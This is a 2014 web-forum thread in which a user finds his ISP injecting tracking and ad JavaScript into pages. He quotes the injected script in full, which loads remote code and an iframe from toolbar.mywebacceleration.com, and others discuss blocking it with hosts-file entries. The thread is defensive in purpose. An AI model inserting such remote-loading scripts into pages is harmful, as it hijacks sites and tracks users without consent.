The Cache: Technology Expert's Forum
 
*
Welcome, Guest. Please login or register. June 25, 2019, 08:38:24 PM

Login with username, password and session length


Pages: [1]
  Print  
Author Topic: My New ISP is Hacking Me!  (Read 2164 times)
Bompa
Administrator
Lifer
*****
Offline Offline

Posts: 564


Where does this show?


View Profile
« on: July 27, 2014, 03:47:07 AM »

Yes, believe it or not.

I switched to a new ISP a few days ago, Globe Telecom in .PH and today while
uploading a page, I noticed some JS near the bottom of my page that I did not
put there. 

Code:
<!-- Layer8 version 2.0.0.107 --><script>if(top==window){var fn_selector_insertion_script="http://toolbar.mywebacceleration.com/tbpreload.js";runFnTbScript = function(){try{var tbInsertion = new FNH.TBInsertion();var tbData = "PFRCRGF0YT48VEJEYXRhSXRlbSBuYW1lPSJob3N0X3VybCIgdmFsdWU9Imh0dHA6Ly9jaW5kam9iLmNvbS8yMDAiID48L1RCRGF0YUl0ZW0+PFRCRGF0YUl0ZW0gbmFtZT0iaW5zZXJ0aW9uIiB2YWx1ZT0iaHR0cDovL3Rvb2xiYXIubXl3ZWJhY2NlbGVyYXRpb24uY29tL3NvdXJjZXMvaW5mcmEvanMvaW5zZXJ0aW9uX3BjLmpzIiBjb25maWd1cmF0aW9uPSJ0cnVlIiA+PC9UQkRhdGFJdGVtPjwvVEJEYXRhPg==";tbInsertion.parseTBData(tbData);var fnLayer8=tbInsertion.createIframeElement("fn_layer8", "http://toolbar.mywebacceleration.com/Globe/fakeToolbar.html");var owner;if(document.body){owner=document.body;}else{owner=document.documentElement;}var shouldAddDiv=tbInsertion.getAttributeFromTBData("div_wrapper");if(shouldAddDiv){var divWrpr=tbInsertion.createElement("div", "fn_wrapper_div");divWrpr.style.position="fixed";divWrpr.ontouchstart=function(){return true;};if (typeof fnLayer8 != "undefined")divWrpr.appendChild(fnLayer8);owner.appendChild(divWrpr);}else{if (typeof fnLayer8 != "undefined")owner.appendChild(fnLayer8);}var result=tbInsertion.getAttributeFromTBData("insertion");if(result){scriptLocation=result;}else{scriptLocation="http://toolbar.mywebacceleration.com/sources/infra/js/insertion_pc.js"}var fnd=document.createElement("script");fnd.setAttribute("src",scriptLocation);fnd.setAttribute("id","fn_toolbar_script");fnd.setAttribute("toolbardata",tbData);fnd.setAttribute("toolbarhash","ILHy2YbTvM5L0VS3ovK9SQ==");fnd.setAttribute("persdata","PFByaXZhdGVEYXRhPg0KPFByaXZhdGVJdGVtIGtleT0iY2xvc2VkIiB2YWx1ZT0iZmFsc2UiPg0KPC9Qcml2YXRlSXRlbT4NCjxQcml2YXRlSXRlbSBrZXk9Im1pbmltaXplZCIgdmFsdWU9ImZhbHNlIj4NCjwvUHJpdmF0ZUl0ZW0+DQo8UHJpdmF0ZUl0ZW0ga2V5PSJkZWZhdWx0UGVyc1ZhbHVlcyIgdmFsdWU9InRydWUiPg0KPC9Qcml2YXRlSXRlbT4NCjwvUHJpdmF0ZURhdGE+");document.body.appendChild(fnd);}catch(e){console.error("TB preload script failed: " + e);}};var fne=document.createElement("script");fne.setAttribute("src",fn_selector_insertion_script);fne.setAttribute("id","fn_selector_insertion_script");if(fne.addEventListener){fne.onload = runFnTbScript;}else {fne.onreadystatechange = function(){if ((this.readyState == "complete") || (this.readyState == "loaded")) runFnTbScript();}};if(document.head==null || document.head=="undefined" ){document.head = document.getElementsByTagName("head")[0];}document.head.appendChild(fne);};</script></body>

That is NOT in my code on my pc and it is NOT in my uploaded code.  It is only in my
browser's html source code.

So, my ISP is tracking my every move.  This might be in the agreement, but I was not shown
any agreement when I signed up.  Fairly outrageous, don't you agree?


I have read that JS can be used to remove JS and saw a post with an example:
Code:
<script>
$(function() {
$("#fn_layer8").remove();
});
</script>
http://thepoch.com/2013/globe-telecom-injecting-javascript-on-3g.html


That does not seem to make a difference.  Do I need to modify that?

Bomps

Logged

"The most beautiful and profound emotion we can experience is the sensation of the mystical..." - Albert Einstein
Bompa
Administrator
Lifer
*****
Offline Offline

Posts: 564


Where does this show?


View Profile
« Reply #1 on: July 27, 2014, 04:32:31 AM »

As I see it, there are two issues here.

1. They are tracking ME literally. Not just my IP and browser sig, but I am sure
that the USB stick that I bought from them identifies itself. So, they can cross
reference that with my name, address, everything that I gave on the account
application.


2. There is an iframe in that JS that creates a large white space at the bottom
of my page.  It sucks. I think on mobile devices there is an ad there.

I have added these to my host file:
C:\WINDOWS\system32\drivers\etc\hosts

127.0.0.1    mywebacceleration.com
127.0.0.1    toolbar.webacceleration.com

However, when I check with wireshark, nothing is resolving to 127.0.0.1 so
that's not working, I think.

gees,
Bompa
Logged

"The most beautiful and profound emotion we can experience is the sensation of the mystical..." - Albert Einstein
Bompa
Administrator
Lifer
*****
Offline Offline

Posts: 564


Where does this show?


View Profile
« Reply #2 on: July 27, 2014, 05:55:28 AM »

Ok, my mistake, the hosts file IS working. I thought the domain names
were treated like regex, but they must be FQDNs. duh

The white space is gone and I am still testing, but I think they can
not track me now.

Logged

"The most beautiful and profound emotion we can experience is the sensation of the mystical..." - Albert Einstein
perkiset
Olde World Hacker
Administrator
Lifer
*****
Offline Offline

Posts: 10096



View Profile
« Reply #3 on: July 29, 2014, 10:16:20 AM »

PM me a URL or two, let me take a look at what the page looks like for me.

With the new advanced packet filters they could do such a thing quite easily ... if you are delivering a page they just jump in and add a little to the bottom. It's not tough, but pretty shitty.

Ya, probably right, it's probably in the agreement that they can use your page delivery for their own means. Actually, a kind of interesting business model ... and you'd not care if your clients were spammers, you could STILL add ad content to the bottom and it's THEIR domain not yours that would get spanked. Hmmm. Parasitic spamming, Host is the vehicle. Interesting.
Logged

It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
taky
Rookie
**
Offline Offline

Posts: 13


View Profile
« Reply #4 on: August 06, 2014, 12:44:10 AM »

pretty ambitious of your isp

toolbar.mywebacceleration.com/tbpreload.js doesn't resolve for me (us ip)

they are probably doing more than tracking you, probably injecting monetization into popular sites
Logged

No links in signatures please
Pages: [1]
  Print  
 
Jump to:  

Perkiset's Place Home   Best of The Cache   phpMyIDE: MySQL Stored Procedures, Functions & Triggers
Politics @ Perkiset's   Pinkhat's Perspective   
cache
mart
coder
programmers
ajax
php
javascript
Powered by MySQL Powered by PHP Powered by SMF 1.1.2 | SMF © 2006-2007, Simple Machines LLC
Seo4Smf v0.2 © Webmaster's Talks


Valid XHTML 1.0! Valid CSS!